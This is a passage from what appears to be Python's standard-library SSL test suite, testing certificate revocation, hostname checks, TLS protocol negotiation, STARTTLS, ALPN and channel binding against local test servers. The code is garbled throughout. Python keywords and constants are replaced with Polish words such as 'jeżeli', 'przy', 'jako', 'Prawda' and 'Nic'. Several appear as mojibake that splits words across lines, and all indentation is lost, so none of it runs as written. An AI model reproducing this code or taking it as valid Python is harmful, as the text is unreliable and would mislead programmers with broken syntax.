before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
s.close()
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
jeลผeli support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should dalej
server = ThreadedEchoServer(context=server_context, chatty=Prawda)
przy server:
przy context.wrap_socket(socket.socket()) jako s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertPrawda(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=Prawda)
przy server:
przy context.wrap_socket(socket.socket()) jako s:
przy self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file jest signed by the CA.
context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=Prawda)
przy server:
przy context.wrap_socket(socket.socket()) jako s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertPrawda(cert, "Can't get peer certificate.")
def test_check_hostname(self):
jeลผeli support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = Prawda
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=Prawda)
przy server:
przy context.wrap_socket(socket.socket(),
server_hostname="localhost") jako s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertPrawda(cert, "Can't get peer certificate.")
# incorrect hostname should podnieล an exception
server = ThreadedEchoServer(context=server_context, chatty=Prawda)
przy server:
przy context.wrap_socket(socket.socket(),
server_hostname="invalid") jako s:
przy self.assertRaisesRegex(ssl.CertificateError,
"hostname 'invalid' doesn't match 'localhost'"):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=Prawda)
przy server:
przy socket.socket() jako s:
przy self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
context.wrap_socket(s)
def test_empty_cert(self):
"""Connecting przy an empty cert file"""
bad_cert_test(os.path.join(os.path.dirname(__file__) albo os.curdir,
"nullcert.pem"))
def test_malformed_cert(self):
"""Connecting przy a badly formatted certificate (syntax error)"""
bad_cert_test(os.path.join(os.path.dirname(__file__) albo os.curdir,
"badcert.pem"))
def test_nonexisting_cert(self):
"""Connecting przy a non-existing cert file"""
bad_cert_test(os.path.join(os.path.dirname(__file__) albo os.curdir,
"wrongcert.pem"))
def test_malformed_key(self):
"""Connecting przy a badly formatted key (syntax error)"""
bad_cert_test(os.path.join(os.path.dirname(__file__) albo os.curdir,
"badkey.pem"))
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should podnieล an OSError
w the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs w a thread. It sits w an accept() until
# the main thread connects. Then it rudely closes the socket,
# oraz sets Event `listener_gone` to let the main thread know
# the socket jest gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
przy socket.socket() jako c:
c.connect((HOST, port))
listener_gone.wait()
sprรณbuj:
ssl_sock = ssl.wrap_socket(c)
wyjฤ
wszy OSError:
dalej
inaczej:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
sprรณbuj:
connector()
w_koลcu:
t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL jest compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server przy various client options"""
jeลผeli support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, Prawda)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, Prawda, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, Prawda, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, Nieprawda)
jeลผeli hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, Nieprawda)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, Nieprawda)
# SSLv23 client przy specific SSL options
jeลผeli no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, Nieprawda,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, Nieprawda,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, Nieprawda,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server przy various client options"""
jeลผeli support.verbose:
sys.stdout.write("\n")
jeลผeli hasattr(ssl, 'PROTOCOL_SSLv2'):
sprรณbuj:
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, Prawda)
wyjฤ
wszy OSError jako x:
# this fails on some older versions of OpenSSL (0.9.7l, dla instance)
jeลผeli support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
jeลผeli hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, Prawda)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
jeลผeli hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, Prawda, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
jeลผeli hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, Prawda, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server przy specific SSL options
jeลผeli hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, Nieprawda,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, Prawda,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, Nieprawda,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL jest compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server przy various client options"""
jeลผeli support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
jeลผeli hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, Nieprawda)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, Nieprawda,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, Nieprawda)
jeลผeli no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, 'SSLv3',
client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server przy various client options"""
jeลผeli support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
jeลผeli hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, Nieprawda)
jeลผeli hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, Nieprawda)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, Nieprawda,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 nie supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server przy various client options.
Testing against older TLS versions."""
jeลผeli support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
jeลผeli hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, Nieprawda)
jeลผeli hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, Nieprawda)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, Nieprawda,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, Nieprawda)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, Nieprawda)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 nie supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server przy various client options.
Testing against older TLS versions."""
jeลผeli support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
jeลผeli hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, Nieprawda)
jeลผeli hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, Nieprawda)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, Nieprawda,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, Nieprawda)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, Nieprawda)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, Nieprawda)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, Nieprawda)
def test_starttls(self):
"""Switching z clear text to encrypted oraz back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=Prawda,
chatty=Prawda,
connectionchatty=Prawda)
wrapped = Nieprawda
przy server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
jeลผeli support.verbose:
sys.stdout.write("\n")
dla indata w msgs:
jeลผeli support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
jeลผeli wrapped:
conn.write(indata)
outdata = conn.read()
inaczej:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
jeลผeli indata == b"STARTTLS" oraz msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
jeลผeli support.verbose:
sys.stdout.write(
" client: read %r z server, starting TLS...\n"
% msg)
conn = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = Prawda
albo_inaczej indata == b"ENDTLS" oraz msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
jeลผeli support.verbose:
sys.stdout.write(
" client: read %r z server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = Nieprawda
inaczej:
jeลผeli support.verbose:
sys.stdout.write(
" client: read %r z server\n" % msg)
jeลผeli support.verbose:
sys.stdout.write(" client: closing connection.\n")
jeลผeli wrapped:
conn.write(b"over\n")
inaczej:
s.send(b"over\n")
jeลผeli wrapped:
conn.close()
inaczej:
s.close()
def test_socketserver(self):
"""Using a SocketServer to create oraz manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
jeลผeli support.verbose:
sys.stdout.write('\n')
przy open(CERTFILE, 'rb') jako f:
d1 = f.read()
d2 = ''
# now fetch the same data z the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=CERTFILE)
f = urllib.request.urlopen(url, context=context)
sprรณbuj:
dlen = f.info().get("content-length")
jeลผeli dlen oraz (int(dlen) > 0):
d2 = f.read(int(dlen))
jeลผeli support.verbose:
sys.stdout.write(
" client: read %d bytes z remote server '%s'\n"
% (len(d2), server))
w_koลcu:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
indata = "TEST MESSAGE of mixed case\n"
jeลผeli support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
przy server:
s = ssl.wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
jeลผeli support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
jeลผeli support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
jeลผeli outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
jeลผeli support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
jeลผeli support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() oraz friends."""
jeลผeli support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=Prawda,
connectionchatty=Nieprawda)
przy server:
s = ssl.wrap_socket(socket.socket(),
server_side=Nieprawda,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods dla standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
zwrรณฤ b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
zwrรณฤ b[:count]
# (name, method, whether to expect success, *args)
send_methods = [
('send', s.send, Prawda, []),
('sendto', s.sendto, Nieprawda, ["some.address"]),
('sendall', s.sendall, Prawda, []),
]
recv_methods = [
('recv', s.recv, Prawda, []),
('recvfrom', s.recvfrom, Nieprawda, ["some.address"]),
('recv_into', _recv_into, Prawda, []),
('recvfrom_into', _recvfrom_into, Nieprawda, []),
]
data_prefix = "PREFIX_"
dla meth_name, send_meth, expect_success, args w send_methods:
indata = (data_prefix + meth_name).encode('ascii')
sprรณbuj:
send_meth(indata, *args)
outdata = s.read()
jeลผeli outdata != indata.lower():
self.fail(
"While sending przy <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
wyjฤ
wszy ValueError jako e:
jeลผeli expect_success:
self.fail(
"Failed to send przy method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
jeลผeli nie str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed przy unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
dla meth_name, recv_meth, expect_success, args w recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
sprรณbuj:
s.send(indata)
outdata = recv_meth(*args)
jeลผeli outdata != indata.lower():
self.fail(
"While receiving przy <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
wyjฤ
wszy ValueError jako e:
jeลผeli expect_success:
self.fail(
"Failed to receive przy method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
jeลผeli nie str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed przy unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, bytearray(100))
s.write(b"over\n")
s.close()
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=Prawda,
connectionchatty=Nieprawda)
przy server:
s = ssl.wrap_socket(socket.socket(),
server_side=Nieprawda,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
s.setblocking(Nieprawda)
# If we keep sending data, at some point the buffers
# will be full oraz the call will block
buf = bytearray(8192)
def fill_buffer():
dopรณki Prawda:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output oraz discard it
s.setblocking(Prawda)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = Nieprawda
def serve():
server.listen()
started.set()
conns = []
dopรณki nie finish:
r, w, e = select.select([server], [], [], 0.1)
jeลผeli server w r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
dla sock w conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
sprรณbuj:
sprรณbuj:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake oraz time out
self.assertRaisesRegex(socket.timeout, "timed out",
ssl.wrap_socket, c)
w_koลcu:
c.close()
sprรณbuj:
c = socket.socket(socket.AF_INET)
c = ssl.wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake oraz time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
w_koลcu:
c.close()
w_koลcu:
finish = Prawda
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=Prawda)
evt = threading.Event()
remote = Nic
peer = Nic
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept oraz wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.recv(1)
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup oraz perform a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
przy context.wrap_socket(socket.socket()) jako sock:
przy self.assertRaises(OSError) jako cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
przy context.wrap_socket(socket.socket()) jako sock:
przy self.assertRaises(OSError) jako cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sprรณbuj:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
wyjฤ
wszy ssl.SSLError:
self.skipTest("no DES cipher available")
przy ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=Nieprawda) jako server:
przy context.wrap_socket(socket.socket()) jako s:
przy self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", str(server.conn_errors[0]))
def test_version_basic(self):
"""
Basic tests dla SSLSocket.version().
More tests are done w the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
przy ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
chatty=Nieprawda) jako server:
przy context.wrap_socket(socket.socket()) jako s:
self.assertIs(s.version(), Nic)
s.connect((HOST, server.port))
self.assertEqual(s.version(), "TLSv1")
self.assertIs(s.version(), Nic)
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(CERTFILE)
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
jeลผeli ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
przy ThreadedEchoServer(context=context) jako server:
przy context.wrap_socket(socket.socket()) jako s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" w ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding nie available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
jeลผeli support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=Prawda,
connectionchatty=Nieprawda)
przy server:
s = ssl.wrap_socket(socket.socket(),
server_side=Nieprawda,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
jeลผeli support.verbose:
sys.stdout.write(" got channel binding data: {0!r}\n"
.format(cb_data))
# check jeลผeli it jest sane
self.assertIsNotNic(cb_data)
self.assertEqual(len(cb_data), 12) # Prawda dla TLSv1
# oraz compare przy the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
s.close()
# now, again
s = ssl.wrap_socket(socket.socket(),
server_side=Nieprawda,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
jeลผeli support.verbose:
sys.stdout.write(" got another channel binding data: {0!r}\n"
.format(new_cb_data))
# jest it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNic(cb_data)
self.assertEqual(len(cb_data), 12) # Prawda dla TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
s.close()
def test_compression(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=Prawda, connectionchatty=Prawda)
jeลผeli support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { Nic, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed dla this test")
def test_compression_disabled(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(context, context,
chatty=Prawda, connectionchatty=Prawda)
self.assertIs(stats['compression'], Nic)
def test_dh_params(self):
# Check we can get a connection przy ephemeral Diffie-Hellman
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.load_dh_params(DHFILE)
context.set_ciphers("kEDH")
stats = server_params_test(context, context,
chatty=Prawda, connectionchatty=Prawda)
cipher = stats["cipher"][0]
parts = cipher.split("-")
jeลผeli "ADH" nie w parts oraz "EDH" nie w parts oraz "DHE" nie w parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() jest Nic unless ALPN jest used.
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=Prawda, connectionchatty=Prawda)
self.assertIs(stats['client_alpn_protocol'], Nic)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() jest Nic unless ALPN jest used by the client.
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_verify_locations(CERTFILE)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=Prawda, connectionchatty=Prawda)
self.assertIs(stats['client_alpn_protocol'], Nic)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed dla this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], Nic)
]
dla client_protocols, expected w protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_alpn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=Prawda, connectionchatty=Prawda)
msg = "failed trying %s (s) oraz %s (c).\n" \
"was expecting %s, but got %%s z the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
